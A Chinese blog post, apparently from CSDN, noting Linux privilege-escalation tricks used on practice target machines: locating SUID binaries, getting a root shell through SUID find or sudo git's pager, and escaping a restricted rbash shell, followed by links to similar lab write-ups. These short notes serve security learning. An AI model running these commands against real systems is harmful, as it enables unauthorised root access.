记录靶机渗透中用到的提权方法

最新推荐文章于 2024-05-13 00:20:19 发布
最新推荐文章于 2024-05-13 00:20:19 发布
阅读量5.5k 收藏 5
点赞数
分类专栏: 网安 文章标签: git web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yaphst/article/details/123499110
版权

1、find提权

(1)首先使用如下命令查看具有suid 权限的可执行二进制程序

find / -perm -4000 -type f 2>/dev/null
或
find / -perm -u=s -type f 2>/dev/null

参数含义参考find基础命令

-perm:按照文件权限来查找文件,4000,2000,1000为分别表示SUID,SGID,SBIT,如777为普通文件的最高权限,7000为特殊文件的最高权限
-type:d(目录)f(文件)c(字符设备文件)b(块设备文件)

(2)若find命令在输出结果中,执行如下代码,提权

touch 123.txt
find 123.txt -exec "/bin/sh" \;

2、git提权

(1)首先sudo -l查看可以无需密码以root权限执行的命令
(2)若结果存在git命令,执行以下代码强制进入交互状态,让页面缓冲区无法显示全部信息 (放大字体或将窗口变窄)。

sudo git -p --help 
或
sudo git help config

(3)在末行命令模式输入!/bin/bash完成提权
在这里插入图片描述

3、rbash逃逸

BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

如图,代码执行完毕后已经可以切换目录了,说明rbash逃逸成功
在这里插入图片描述
后续持续更新。。。

一路1向北
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
crasher.tar(DC3靶机所需提权exp-2)
02-20
DC3靶机所需提权exp
靶机渗透】Escalate_Linux靶机渗透练习+12种提权方式
serendipity1130的博客
08-31 4111
注:这个靶机主要用来练习Linux提权,有超过12种的提权方法 1.主机发现:arp-scan -l,发现靶机ip为192.168.225.149,并进行访问 2.扫描端口,开启了80,22端口 nmap -n -p- -A 192.168.225.149 -o escalate.nmap 3.发现是默认的apache页面,那么爆破php后缀的路径,发现shell.php的页面,进行访问: dirb http://192.168.225.149 -X .php 4.提示:
Linux权限提升总结_linux 提权
最新发布
2401_84969775的博客
05-13 292
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
DC-1靶机提权
qq_45070118的博客
09-15 883
主机发现 目标为192.168.10.194 端口56937,111,22,80开启 扫描端口服务 扫描主机下的目录 nmap用脚本扫描靶机的漏洞 发现存在cve-2014-3704 打开msf 搜索CVE-2014-3704 进入模块 设置目标ip和线程 查看 进攻 然后进入meterpreter,拿到wellshell ls ps 权限提升 有的时候,你可能会发现自己的 ...
渗透靶机进行提权
weixin_48876267的博客
10-21 452
渗透靶机进行提权 1 获取靶机相关信息 nmap -sV 192.168.222.131 *** Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-20 03:09 EDT Nmap scan report for localhost (192.168.222.131) Host is up (0.000067s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/
DC1-9靶机提权总结
问彡心的博客
09-27 1683
使用Drupal的漏洞查看能以root身份执行的文件列表结果显示有find命令通过find与系统命令结合,进入root身份的shell控制台。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
DC-7靶机渗透测试 (GPG,drush,mkfifo,nc提权
single_g_l的博客
08-13 1186
找到上传路径Content—>Add content-->Basic page下,准备添加PHP代码反弹shell,但发现Drupal 8不支持PHP代码,需要安装插件,将php模块(https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz)导入(导入路径extend—>+Install new module),导入成功后在extend添加模块。解锁之后,账号才成功登录。查看config文件,发现账号密码,尝试登录,发现报错,账号或密码不正确。...
Linux曝出Sudo提权漏洞 任意用户亦可运行root命令
01-10
作为 Linux 最常使用的重要实用程序之一,Sudo 几乎安装在每一款 UNIX 和 Linux 发行版上,以便用户调用和实施核心命令。 然而近期曝出的一个提权漏洞,却直指 sudo 的一个安全策略隐患 —— 即便配置明确不允许 root 用户访问,该漏洞仍可允许恶意用户或程序,在目标 Linux 系统上以 root 用户身份执行任意命令。 (题图 via Hacker News ) 据悉,Sudo 特指“超级用户”。作为一个系统命令,其允许用户以特殊权限来运行程序或命令,而无需切换使用环境(通常以 root 用户身份运行命令)。 默认情况下,在大多数 Linux 发行版(如屏幕快照
FBI靶机提权流程分析
cXiaoLee的博客
02-28 192
find命令提权常用命令
墨痕诉清风的博客
06-07 1756
查看具有suid 权限的可执行二进制程序 查找root权限可写文件 其它用户也可以写 查找root权限可写、可执行文件 其它用户也可以写、执行 查找当前用户可读文件 find提权 若find命令suid在输出结果,执行如下代码,提权...
find基础命令与提权教程
热门推荐
weixin_44912169的博客
04-29 1万+
find基础命令与提权教程 find命令用来在指定目录下查找文件,若不指定目录则视为当前目录 find常用参数 语法:find [path…] [expression] path为查找路径,.为当前路径,/为根目录 expression即为参数 -name: 按文件名查找文件 -perm: 按照文件权限来查找文件,4000,2000,1000为分别表示SUID,SGID,SBIT,如77...
find命令提权以及反弹shell复现
qq_40898302的博客
04-21 7710
关于linux系统的find命令提权复现
linux 提权总结_linux提权,2024年最新成功拿到offer
2301_76225325的博客
04-13 1002
SUID权限只在程序执行过程如何查找?(1)通过find可用于反弹shell需要注意的是,php反弹shell的这些方法都需要php关闭safe_mode这个选项,才可以使用exec函数。普通用户反弹带suid的find命令反弹-ip表示以特权模式启动的一个交互式shell(2)cp利用openssl生成密码将/etc/passwd文件复制到当前目录,添加用户,并且添加密码上面添加了aaa用户,但是用户id为0,表示root权限
DC-2渗透笔记SUID-git提权
qq_74157343的博客
09-21 124
DC-2,wp
linux提权方法(不断更新)
qq_42430287的博客
04-13 579
1.suid提权 搜索符合条件的可以用来提权的: find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} \; find / -user root -perm -4000 -print 2>/dev/null 三种都可以 搜索可以提权的程序,一般有以下 : nmap vi...
windows提权靶机
09-12
Windows提权靶机是用于学习和实践Windows系统提权技术的虚拟机或实体机。它模拟了一个具有已知漏洞或弱点的Windows系统,让安全研究人员、渗透测试人员或学习者能够探索和实践提权攻击技术。 有一些常见的Windows提权靶机可供使用,比如: 1. Metasploitable:这是一个常用的漏洞测试靶机,其包含了多个已知漏洞,包括Windows系统的一些弱点。 2. VulnHub:这是一个提供多种漏洞靶机的平台,你可以在上面找到适合你学习和实践的Windows提权靶机。 3. HackTheBox:这是一个在线渗透测试实验平台,提供了一系列具有各种漏洞和挑战的虚拟机。 请注意,在使用任何靶机之前,请确保你已经获得了合法的授权,并遵守法律和道德准则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值